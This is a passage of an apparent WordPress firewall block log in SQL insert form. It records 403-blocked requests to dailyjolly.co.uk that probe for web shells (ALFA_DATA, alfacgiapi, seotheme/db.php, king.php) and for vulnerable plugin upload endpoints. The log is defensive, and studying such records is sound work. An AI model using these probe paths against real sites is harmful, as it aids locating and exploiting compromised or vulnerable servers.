User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11246,1673898993.697118,1673898993.562800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11247,1673898969.397591,1673898969.262100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11248,1673898936.310060,1673898936.198000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11249,1673898935.207166,1673898935.091000,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11250,1673898934.056102,1673898933.936800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11251,1673898932.842238,1673898932.724900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11252,1673898930.476505,1673898930.346900,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11253,1673898883.304744,1673898883.172700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11254,1673904679.155667,1673904679.044900,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11255,1673904678.968459,1673904678.848400,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php.suspected?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocC5zdXNwZWN0ZWQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11256,1673904678.772151,1673904678.658600,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/plugins/content/apismtp/apismtp.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11257,1673904678.671410,1673904678.545000,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FsZmFjZ2lhcGkvcGVybC5hbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11258,1673904678.581499,1673904678.442400,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php?test=hello',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11259,1673904678.559656,1673904678.425400,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11260,1673904678.318385,1673904678.178400,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/ALFA_DATA/alfacgiapi/perl.alfa','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11261,1673904678.290549,1673904678.156300,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(11262,1673904678.277910,1673904678.143400,'\0\0\0\0\0\0\0\0\0\0����jY',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11263,1673907412.528575,1673907412.400700,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpzip/wpzip.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHppcC93cHppcC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11264,1673907385.688007,1673907385.559900,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpyii2/wpyii2.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHlpaTIvd3B5aWkyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11265,1673907355.931838,1673907355.796300,'\0\0\0\0\0\0\0\0\0\0��©�\'',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpputty/wpputty.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHB1dHR5L3dwcHV0dHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11266,1673913042.648220,1673913041.876100,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11267,1673913040.252116,1673913039.078500,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11268,1673914008.494194,1673914007.506300,'\0\0\0\0\0\0\0\0\0\0����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11269,1673917762.183690,1673917762.014800,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mYW5jeS1wcm9kdWN0LWRlc2lnbmVyL2luYy9jdXN0b20taW1hZ2UtaGFuZGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11270,1673917734.971948,1673917734.835100,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mYW5jeS1wcm9kdWN0LWRlc2lnbmVyL2luYy9jdXN0b20taW1hZ2UtaGFuZGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11271,1673917691.687636,1673917691.556700,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mYW5jeS1wcm9kdWN0LWRlc2lnbmVyL2luYy9jdXN0b20taW1hZ2UtaGFuZGxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11272,1673918916.494598,1673918916.025700,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/divi-contact-extended/includes/upload.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kaXZpLWNvbnRhY3QtZXh0ZW5kZWQvaW5jbHVkZXMvdXBsb2FkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11273,1673918915.471478,1673918914.299000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/gatewayapi/inc/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nYXRld2F5YXBpL2luYy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11274,1673918914.144632,1673918913.478300,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/gatewayapi/inc/css_js.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nYXRld2F5YXBpL2luYy9jc3NfanMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11275,1673918913.125524,1673918912.121400,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 